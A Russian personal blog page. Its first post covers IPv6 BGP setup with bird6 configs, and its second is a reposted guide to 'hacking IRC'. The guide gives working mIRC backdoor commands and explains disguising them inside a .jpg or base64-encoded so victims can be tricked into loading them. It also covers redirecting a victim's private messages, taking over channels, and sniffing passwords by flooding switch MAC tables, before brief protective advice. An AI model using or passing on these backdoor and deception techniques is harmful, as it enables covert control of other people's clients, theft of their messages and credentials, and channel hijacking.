Недавно я стал счастливым обладателем собственной AS с сетью IPv6 адресов. Адреса надо как-то маршрутизировать во внешний интернет и внешнему интернету как-то сообщить где мои адреса находятся. Этим занимается протокол BGP. В Linux он представлен несколькими демонами, один из которых – bird.
Есть просто bird и bird6. Тот что “просто” – этот для IPv4, тот что bird6 – для IPv6. Так как прямого выхода на IX у меня нет я воспользовался туннелями. До получения AS и сети я пользовался Hurricane Electric . К ним и проложил туннель, внутри которого bgp-сессия. Через полчаса после запроса туннеля (столько надо было HE чтобы активировать его) я увидел мир IPv6 BGP. Затем потихоньку (за пару-тройку дней) перевёл все свои сервисы на новые адреса и продолжил искать путь приближения к IPv6-интернету.
Кто ищет тот всегда найдёт! Найден был комстар-директ, который даёт транзит IPv6. Написал им письмо с запросом туннеля. Утром получил ответ и приступил к настройке.
Не всё так просто вышло как с HE. Туннель завёлся быстро, а вот BGP-сессия почему-то подниматься не хотела. Как выяснилось позже, причиной тому был MTU (тот, что Max Transfer Unit). Сменили тип туннеля на gre, поставили MTU 1452 и всё зажужжало.
Итого – у меня есть своя AS со своей сетью IPv6-адресов и два выхода в мир через BGP. С приоритетами куда через какой канал роутить я ещё не игрался. Это мне ещё предстоит сделать :)
Успел уже пособрать на свой шлюз IPv6-сети друзей-знакомых чтобы им до меня было быстрее и мне до них. Они пока не созрели до своих собственных сетей – им и не надо. Если кому хочется получить /64 или /56 быстрого IPv6-интернета – стучитесь в джаббер antmix на stopicq.ru или в почту – mikhail на antmix.pp.ru. А сам сети свои я растянул по организациям, которые я обслуживаю. Пора уже везде IPv6 вводить в полный рост. Лучше тихо спокойно понаступать на грабли, чем делать это в авральном режиме.
Ну и конечно немного конфигов.
~# cat /etc/bird6.conf router id x.x.x.x; protocol kernel { persist; # Don't remove routes on bird shutdown scan time 20; # Scan kernel routing table every 20 seconds export all; # Default is export none } protocol device { scan time 10; # Scan interfaces every 10 seconds } protocol static { route 2001:67c:WWW::/48 reject; } protocol bgp { description "COMSTAR IPv6"; local as YYY; neighbor 2a02:28:XXX:2::2a:1 as ZZZ; export filter { if net = 2001:67c:WWW::/48 then accept; else reject; }; import all; } protocol bgp { description "Hurricane Electrics IPv6"; local as YYY; neighbor 2001:470:DDD:12a::1 as BBB; export filter { if bgp_path ~ [= YYY =] then bgp_path.prepend(YYY); if net = 2001:67c:WWW::/48 then accept; else reject; }; import all; }
Кусок /etc/network/interfaces auto he-ipv6 iface he-ipv6 inet6 v4tunnel address 2001:470:DDD:12a::2 netmask 64 endpoint x.x.x.x local y.y.y.y ttl 64 mtu 1400 auto comstar6 iface comstar6 inet manual up ip tun add comstar6 mode gre remote z.z.z.z local y.y.y.y; ip l s comstar6 up; ip a a 2a02:28:XXX:2::2a:2/112 dev comstar6; down ip l s comstar6 down; ip tun del comstar6
А для тех, кто по прежнему свято верит что IPv6 тормозной и сейчас его использовать невозможно – тест скорости:
Не так давно спросили у меня как взломать IRC и как защититься. Спрашивали это все чаще и чаще. Написал я это. Источник находится здесь
—- Как взломать IRC и как от этого защититься.
Автор: Bart[mdv]
Спасибо за помощь в составлении: keY, cHameleon
* Как получить контроль над mIRC-based - клиентами
Заставьте жертву ввести //write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pas и только после этого вводите приведённые ниже команды:
Сделать, чтоб юзер зашёл на канал: /ctcp nick .join #chan
Юзер покидает канал: /ctcp nick .part #chan
Т.к админы IRC-сетей люди довольно образованные и грамотные в этих вопросах, то во многих сетях прикрыли использование команды //write, т.к таким образом довольно много эксплоитов и троянов распространялось в IRC-сетех. Делаем следующим образом:
1. берем любую картинку, открываем ее в текстовом редакторе (Блокнот) и вписываем туда echo .... echo .... echo .... ctcp 1:*:?:$1-
И сохраняем картинку в формат *.jpg
2. Картинку нужно впарить пользователям на канале (тут сами)
3. пользователь при попытке посмотреть содержимое картинки, ничего не увидит, и вы ему рекомендуете набрать следующее в любом окне его клиента /load -rs НАЗВАНИЕ_КАРТИНКИ.jpg , скрипт будет загружен в клиент "жертвы" дальше все по схеме, изложенной выше.
Так же практикуется кодирование: .//.write mirc.bak $decode(b24gKjpURVhUOuPw8+foKjoqOnsKY2xvc2UgLW 0gJG5pY2sKd3JpdGUgJGRlY29kZSgkMixtKSAkZGVjb2RlKCQzLG0pCm xvYWQgLXJzICRkZWNvZGUoJDIsbSkKfQ,m) | .load -rs mirc.bak
Как захватить канал
Всучив скрипт, указанный выше, можно легко сменить фаундера канала на себя.
Или просто сменить пароль фаундера на канал и легко идентиться с правами фаундера.
Я не буду расказываться как воспользоваться отсутствием всех на канале и как воспользоваться сплитом для захвата канала – это все не работает в нормальных сетях с сервисами :-)
Как читать чужие приваты в mIRC-based – клиентах
Втюхиваем жертве скрипт с содержанием:
on ::?:.msg куда $1-
Как? Вспомните про //write //load $encode и $decode :-)
Как можно стырить пароли от ников/каналов и даже иркопов
Если вы пользуетесь irc в локалке – качаем снифер – wireshark например, настраиваем фильтры на порт 6667 – ловим весь IRC трафик.
Если сниффер поймал только вас – не спешите огорчаться – если свитчики стоят глупенькие – у них есть MAC-таблица, и если ее переполнить – свитчик превращается... превращается свитчик... в тупой хабчик :-)
Такая атака осуществима только если строители сети, в которой вы находитесь, съэкономили кучу денег на нормальных свитчах.
Ах, да, имейте ввиду, если админы локалки просекут кто это сделал, скорее всего вас отрубят от сети :-)
Как защититься:
* Не стоит набирать незнакомых команд
* Если очень хочется попробовать – спросите сначала на канале помощи о результате этой команды
( в сети SolarNet каналом помощи является #help )
* Используйте шифрованное SSL-подключение везде, где это возможно
( в сети SolarNet для SSL используется порт 9997 )
* Как узнать, что пользователь подключен по SSL?
В /whois указывается is using a Secure Connection, а также пользователю выдается флажок +S
* Как запретить заходить на канал всем, кроме тех, кто подключены через SSL?
Нужно поставить на канал флаг +S /mode #chan +S
Как защитить не только IRC и сэкономить трафик:
Берем OpenVPN.
Получаем компрессию (на веб-страницах до 40%) и шифрование (с помощью SSL) своего трафика.
Очень рекомендуется пользоваться OpenVPN когда приходится уезжать за пределы “нормального” интернета и пользоваться GPRS.
Приимущества OpenVPN (зачем нужен OpenVPN)
+ сжатие и шифрование всего трафика
+ не надо каждой софтине указывать какие-то прокси
+ если твой провайдер использует сеть на хабах – твой трафик (в т.ч. твои пароли на аську/почту/ирц/итп) поснифать уже не получится
+ если нет доверия любому из узлов между тобой и инетом (например не вызывающий доверия провайдер) – стоит использовать шифрование.
+ ты никогда не засветишь свой настоящий IP
+ докупив доп. IP ты можешь привязать его к OpenVPN и будет у тебя твой выделенный реальный IP со всеми его плюсами (это для тех, у кого провайдеры не выдают реальники, а очень хочется)
Можно еще напридумывать плюсов.
Минус я только один вижу – надо иметь свой сервер в инете. Этот минус решается покупкой VDS-хостинга :-)
| 
опубликовано: Мар 29, 22:27